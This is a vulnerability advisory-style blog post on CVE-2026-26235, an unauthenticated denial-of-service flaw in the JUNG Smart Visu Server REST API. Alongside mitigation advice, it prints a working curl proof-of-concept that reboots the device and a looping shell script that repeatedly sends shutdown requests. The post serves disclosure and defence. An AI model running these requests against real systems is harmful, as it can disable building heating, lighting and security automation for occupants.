Feb 12, 2026·7 min read·10 visits
Unauthenticated Remote Denial of Service in JUNG Smart Visu Server 1.1.1050 via the REST API. An attacker can remotely reboot or shut down the device using a simple JSON POST request.
In the world of high-end home automation, the JUNG Smart Visu Server is the brain connecting your KNX bus, Philips Hue, and Sonos systems. But thanks to a glaring oversight in its REST API, it's also a ticking time bomb. CVE-2026-26235 reveals that this 'smart' server exposes critical system controls—specifically reboot and shutdown functions—to the entire network without a shred of authentication. Any unauthenticated attacker can effectively pull the plug on the building's automation logic with a single HTTP packet, turning a smart home into a bricked house.
Imagine spending thousands on a KNX-based smart home system. You have automated blinds that track the sun, heating that adjusts to your presence, and lighting scenes that would make a cinematographer weep. The brain of this operation is the JUNG Smart Visu Server (SV Server). It is the conductor of your domestic orchestra. Now, imagine if a bored teenager with a laptop could walk by your house, connect to your poorly secured Guest Wi-Fi (or hit your shodan-indexed public IP), and send a single command that kills the conductor instantly.
That is exactly what CVE-2026-26235 represents. It isn't a complex buffer overflow involving ROP chains and heap grooming. It isn't a subtle race condition. It is a fundamental architectural faceplant where the developers seemingly forgot that 'Administrative Control' usually requires 'Administration Rights'.
The vulnerability lies in the device's web-based management interface, which sits on top of a Jetty server. While the user interface might look slick, the backend REST API is wide open. The researchers at Zero Science Lab (LiquidWorm) discovered that the endpoint responsible for system power states treats every request like it's coming from a trusted superuser. This isn't just a bug; it's a feature designed without a lock.
The root cause here is a classic instance of CWE-306: Missing Authentication for Critical Function. In modern web application development, we typically use middleware to intercept requests to sensitive routes (like /admin/* or /system/*) and verify a session token or API key. If the token is missing or invalid, the server should return a 401 Unauthorized or 403 Forbidden.
The JUNG Smart Visu Server, however, operates on a strictly 'honour system'. The endpoint /rest/items/liteserver_LiteServer_1_systemControl is exposed to the network. This endpoint is designed to bridge HTTP JSON requests to the underlying OS or firmware control logic. When the Jetty server receives a POST request here, it parses the JSON body and executes the command immediately.
There is no check for a session cookie. There is no check for an Authorization header. The server simply assumes that if you know the URL and the magic JSON words, you must be the administrator. This suggests a development mindset where the Local Area Network (LAN) is considered a trusted zone—a fallacy that has been debunked for at least two decades. If this device is exposed to the internet (which many are, for remote control apps), the 'trusted zone' becomes the entire world.
Since the firmware source is proprietary, we analyze the 'code' of the attack vector—the HTTP interaction that the server accepts as valid instruction. The server uses a verbose JSON structure to define message types. The vulnerable endpoint listens for MSG_ID_TYPE parameters.
Below is a comparison of what a secure implementation should look like versus the reality of CVE-2026-26235.
The Vulnerable Implementation (Concept):
// Pseudo-code of the vulnerable handler
app.post('/rest/items/liteserver_LiteServer_1_systemControl', (req, res) => {
// No Auth Check! Just parse and execute.
let command = req.body.MSG_ID_TYPE;
if (command === 'MSG_REBOOT_REQ') {
system.reboot(); // Goodnight, sweet prince.
return res.send({ status: 'Rebooting' });
}
if (command === 'MSG_HALT_REQ') {
system.shutdown(); // Power off.
return res.send({ status: 'Halting' });
}
});The Attack Payload:
To trigger the reboot, the attacker constructs a standard HTTP POST. The content type is implicitly handled, and the payload is remarkably simple:
{
"MSG_ID_TYPE": "MSG_REBOOT_REQ"
}The server parses this JSON key. It doesn't care about the source IP, the User-Agent, or the lack of credentials. It sees MSG_REBOOT_REQ and immediately issues the system call to restart the operating system. The MSG_HALT_REQ is even more severe, as it triggers a shutdown, requiring physical access to power-cycle the device manually to bring it back online.
Exploiting this vulnerability requires zero coding skills. It can be done from a terminal, a browser console, or a home automation script gone rogue. The barrier to entry is effectively non-existent. An attacker on the network needs only the IP address of the target.
Here is the full weaponized Proof of Concept (PoC) provided by Zero Science Lab. This single command will force the server to reboot immediately:
curl -X POST "http://<TARGET_IP>:8080/rest/items/liteserver_LiteServer_1_systemControl" \
-H "User-Agent: thricer-engine/1.6" \
-d "{\"MSG_ID_TYPE\":\"MSG_REBOOT_REQ\"}"The Infinite Loop Scenario:
A malicious actor could easily script this into a while(true) loop. By sending this request every 60 seconds, they could force the JUNG server into a permanent boot loop, rendering the smart home completely unresponsive indefinitely.
# The "Poltergeist" Script
while true; do
echo "[+] Killing the lights..."
curl -s -X POST "http://<TARGET_IP>:8080/rest/items/liteserver_LiteServer_1_systemControl" -d "{\"MSG_ID_TYPE\":\"MSG_HALT_REQ\"}"
sleep 30
doneIf the attacker chooses MSG_HALT_REQ (Shutdown) instead of reboot, the denial of service is persistent until a human physically interacts with the hardware server.
This vulnerability scores high on the CVSS scale (8.7 for v4.0) primarily due to Availability impact, but let's translate that into the real world. The JUNG Smart Visu Server is not just a toy; it is infrastructure.
1. Loss of Environmental Control: In a commercial setting or a large smart home, the KNX bus relies on logic controllers. If the Visu Server is handling logic for heating, ventilation, and air conditioning (HVAC), a shutdown could freeze pipes in winter or overheat server rooms.
2. Security System Blindness: Many integrations tie security sensors (motion, door contacts) to the visualization server for alerts or automated lighting responses. Killing the server blinds these specific automated responses. While the base alarm system might function independently, the intelligence layer is gone.
3. The 'WAF' (Wife Acceptance Factor) Crash: On a lighter but practical note, nothing infuriates end-users more than technology that doesn't work. A prankster neighbor or a compromised IoT toaster on the same VLAN could randomly reboot the house controller, causing lights to flicker or turn off, creating a 'haunted house' scenario that is notoriously difficult to debug without packet capture logs.
As of the disclosure in February 2026, the vendor (ALBRECHT JUNG GMBH & CO. KG) had not released a patch despite the report being filed. This leaves users in a precarious position where 'waiting for an update' is not a viable security strategy.
Immediate Mitigation:
Network Segmentation (The VLAN Moat): The Smart Visu Server should never, ever be on the main Client Wi-Fi or, god forbid, port-forwarded to the internet. Move it to a dedicated Management VLAN with strict Access Control Lists (ACLs). Only allow traffic to port 8080 from trusted admin workstations.
Reverse Proxy with Auth:
If you must access it remotely or from other subnets, place a reverse proxy (like Nginx or Traefik) in front of it. Configure the proxy to require Basic Auth or Mutual TLS before forwarding the request to the JUNG server. This effectively wraps the vulnerable systemControl endpoint in a layer of authentication that the vendor failed to provide.
WAF Rules:
If a WAF is available, block any POST request to URI containing systemControl that originates from untrusted IPs, or inspect the body for MSG_REBOOT_REQ and drop the packet.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N| Product | Affected Versions | Fixed Version |
|---|---|---|
Smart Visu Server ALBRECHT JUNG GMBH & CO. KG | = 1.1.1050 | None |
| Attribute | Detail |
|---|---|
| CWE | CWE-306: Missing Authentication |
| CVSS v4.0 | 8.7 (High) |
| Attack Vector | Network (Remote) |
| Impact | Denial of Service (DoS) |
| Exploit Status | PoC Publicly Available |
| Vendor Status | Unpatched (0-day) |
The software does not prove or insufficiently proves the claim of identity of a user who requests a critical function.